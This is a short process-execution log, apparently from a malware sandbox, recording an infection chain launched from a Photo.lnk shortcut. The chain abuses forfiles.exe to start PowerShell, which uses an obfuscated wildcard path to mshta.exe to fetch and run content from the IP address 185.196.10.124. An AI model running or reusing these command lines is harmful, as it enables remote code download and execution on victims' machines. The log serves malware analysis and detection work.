cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "djoMrZ" C:\Users\test22\AppData\Local\Temp\Photo.lnk
2548forfiles.exe "C:\Windows\System32\forfiles.exe" /p C:\Windows\System32 /m calc.exe /c "powershell . \*i*\S*3*\m*ta.e* http://185.196.10.124/oo"
2636powershell.exe . \*i*\S*3*\m*ta.e* http://185.196.10.124/oo
2720